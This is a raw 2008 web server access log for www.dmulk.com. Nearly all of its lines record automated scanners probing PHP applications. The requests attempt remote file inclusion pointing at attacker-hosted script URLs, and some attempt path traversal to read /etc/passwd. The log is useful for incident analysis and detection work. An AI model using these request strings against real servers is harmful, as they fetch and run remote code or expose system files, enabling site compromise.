202.60.64.194 - - [03/May/2008:10:45:32 -0700] "GET /logs/access_080227.log//newspublish/include.php?path%5Bdocroot%5D=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:45:32 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:45:33 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.227.127.11 - - [03/May/2008:10:45:43 -0700] "GET /logs/access_080228.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.loichua.org/.debug/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.216.227 - - [03/May/2008:10:45:44 -0700] "GET /logs//main.php?sayfa=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.225.216.227 - - [03/May/2008:10:45:44 -0700] "GET //main.php?sayfa=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:45:47 -0700] "GET /logs/access_080227.log//newspublish/include.php?path%5Bdocroot%5D=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:45:48 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:45:52 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.186.117.208 - - [03/May/2008:10:45:54 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.186.117.208 - - [03/May/2008:10:45:54 -0700] "GET //ashnews.php?pathtoashnews=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:10:46:04 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:10:46:05 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:46:07 -0700] "GET /logs/access_080227.log//newspublish/include.php?path%5Bdocroot%5D=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:46:08 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:46:10 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:46:24 -0700] "GET /logs/access_080227.log//newspublish/include.php?path%5Bdocroot%5D=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:46:24 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:46:25 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.151.23.213 - - [03/May/2008:10:46:41 -0700] "GET /logs/access.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [03/May/2008:10:46:42 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [03/May/2008:10:47:27 -0700] "GET /logs/access_080228.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:10:47:52 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:10:47:54 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:10:49:05 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:10:49:07 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:10:49:40 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.0" 200 11590 "-" "libwww-perl/5.803" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:10:49:50 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.93.123 - - [03/May/2008:10:49:56 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:10:49:57 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.93.123 - - [03/May/2008:10:50:11 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
203.22.204.187 - - [03/May/2008:10:50:12 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.187 - - [03/May/2008:10:50:12 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.187 - - [03/May/2008:10:50:13 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
189.22.150.131 - - [03/May/2008:10:50:23 -0700] "GET /logs/access_080225.log/index.php?pagina1=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:10:50:31 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:10:50:32 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [03/May/2008:10:50:34 -0700] "GET /logs/access_071212.log/admin/editor2/spaw_control.class.php?spaw_root=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:10:50:36 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [03/May/2008:10:50:47 -0700] "GET /logs/access_071228.log/admin/editor2/spaw_control.class.php?spaw_root=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.22.204.187 - - [03/May/2008:10:52:13 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
189.22.150.131 - - [03/May/2008:10:52:39 -0700] "GET /logs/access_080204.log/index.php?pagina1=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.223.191 - - [03/May/2008:10:52:39 -0700] "GET /logs/errors.php?error=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.215.223.191 - - [03/May/2008:10:52:40 -0700] "GET /errors.php?error=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:10:53:28 -0700] "GET /logs/access_080215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:10:53:29 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:10:53:29 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:10:54:35 -0700] "GET /logs//ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:10:54:36 -0700] "GET //ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.113.203.55 - - [03/May/2008:10:54:42 -0700] "GET //ashnews.php?pathtoashnews=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.113.203.55 - - [03/May/2008:10:54:42 -0700] "GET //ashnews.php?pathtoashnews=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
96.52.36.19 - - [03/May/2008:10:54:45 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
96.52.36.19 - - [03/May/2008:10:54:46 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
213.186.117.208 - - [03/May/2008:10:54:53 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.187 - - [03/May/2008:10:55:00 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.187 - - [03/May/2008:10:55:00 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.74.37.170 - - [03/May/2008:10:55:03 -0700] "GET /logs//sitemap.xml//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
195.74.37.170 - - [03/May/2008:10:55:03 -0700] "GET //sitemap.xml//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
217.26.209.233 - - [03/May/2008:10:55:25 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.209.233 - - [03/May/2008:10:55:25 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.70.204.99 - - [03/May/2008:10:55:36 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.70.204.99 - - [03/May/2008:10:55:36 -0700] "GET //ashnews.php?pathtoashnews=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.151.217.136 - - [03/May/2008:10:56:31 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
198.151.217.136 - - [03/May/2008:10:56:31 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
195.74.37.170 - - [03/May/2008:10:56:45 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rootshell.altervista.org/r0x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
195.74.37.170 - - [03/May/2008:10:56:46 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rootshell.altervista.org/r0x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
74.208.68.157 - - [03/May/2008:10:56:47 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.68.157 - - [03/May/2008:10:56:47 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [03/May/2008:10:56:49 -0700] "GET //crontab/run_billing.php?config[include_dir]=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [03/May/2008:10:56:49 -0700] "GET /logs//crontab/run_billing.php?config[include_dir]=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:10:56:51 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:10:56:53 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.42.133.2 - - [03/May/2008:10:57:25 -0700] "GET /logs/access_080226.log//crontab/run_billing.php?config[include_dir]=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.86.181.227 - - [03/May/2008:10:57:59 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.86.181.227 - - [03/May/2008:10:57:59 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.208.68.157 - - [03/May/2008:10:58:12 -0700] "GET /logs//jscript.php?my_ms[root]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.68.157 - - [03/May/2008:10:58:12 -0700] "GET //jscript.php?my_ms[root]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.62.128.4 - - [03/May/2008:10:59:10 -0700] "GET /logs//index.php?seccion=http://208.56.164.70/coppermine/docs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:10:59:13 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:10:59:13 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.62.128.4 - - [03/May/2008:10:59:13 -0700] "GET //index.php?seccion=http://208.56.164.70/coppermine/docs/test.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:10:59:25 -0700] "GET /logs/access_080114.log//jscript.php?my_ms[root]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:10:59:26 -0700] "GET //jscript.php?my_ms[root]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:10:59:26 -0700] "GET /logs//jscript.php?my_ms[root]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:10:59:34 -0700] "GET /logs/access_080114.log//myspeach/jscript.php?my_ms[root]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:10:59:34 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:10:59:35 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.8.96 - - [03/May/2008:11:01:46 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.27.91 - - [03/May/2008:11:01:46 -0700] "GET /bikes/dteel/MVI_2434.AVI HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.191.81.165 - - [03/May/2008:11:02:05 -0700] "GET /logs//ashnews.php?pathtoashnews=http://geocities.com/carneline0817/kontol/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.191.81.165 - - [03/May/2008:11:02:06 -0700] "GET //ashnews.php?pathtoashnews=http://geocities.com/carneline0817/kontol/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.215.223.191 - - [03/May/2008:11:03:30 -0700] "GET /errors.php?error=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.19.130 - - [03/May/2008:11:03:58 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [03/May/2008:11:04:22 -0700] "GET /logs/access_080113.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.191.81.165 - - [03/May/2008:11:04:43 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://geocities.com/carneline0817/kontol/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.55.213.30 - - [03/May/2008:11:05:22 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.30 - - [03/May/2008:11:05:23 -0700] "GET /logs/access_080118.log HTTP/1.0" 200 561818 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
203.22.204.187 - - [03/May/2008:11:06:26 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.187 - - [03/May/2008:11:06:27 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.187 - - [03/May/2008:11:06:27 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.187 - - [03/May/2008:11:07:34 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.187 - - [03/May/2008:11:07:36 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.113.24.154 - - [03/May/2008:11:07:57 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [03/May/2008:11:07:57 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
65.55.211.29 - - [03/May/2008:11:08:03 -0700] "GET /retreat1/?M=D HTTP/1.1" 200 15081 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
89.108.67.192 - - [03/May/2008:11:08:53 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [03/May/2008:11:08:54 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [03/May/2008:11:08:54 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [03/May/2008:11:09:10 -0700] "GET /logs/access_071228.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:09:15 -0700] "GET /logs/access_080321.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:09:15 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:09:16 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.48.157 - - [03/May/2008:11:09:20 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.48.157 - - [03/May/2008:11:09:20 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.48.157 - - [03/May/2008:11:09:20 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.48.157 - - [03/May/2008:11:09:32 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.48.157 - - [03/May/2008:11:09:37 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.48.157 - - [03/May/2008:11:09:42 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.48.157 - - [03/May/2008:11:09:56 -0700] "GET /logs/access_080304.log//faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.48.157 - - [03/May/2008:11:10:05 -0700] "GET /logs/access_080304.log//faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [03/May/2008:11:10:15 -0700] "GET /logs/access_080114.log/convert/mvcw.php?step=1&vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [03/May/2008:11:10:15 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
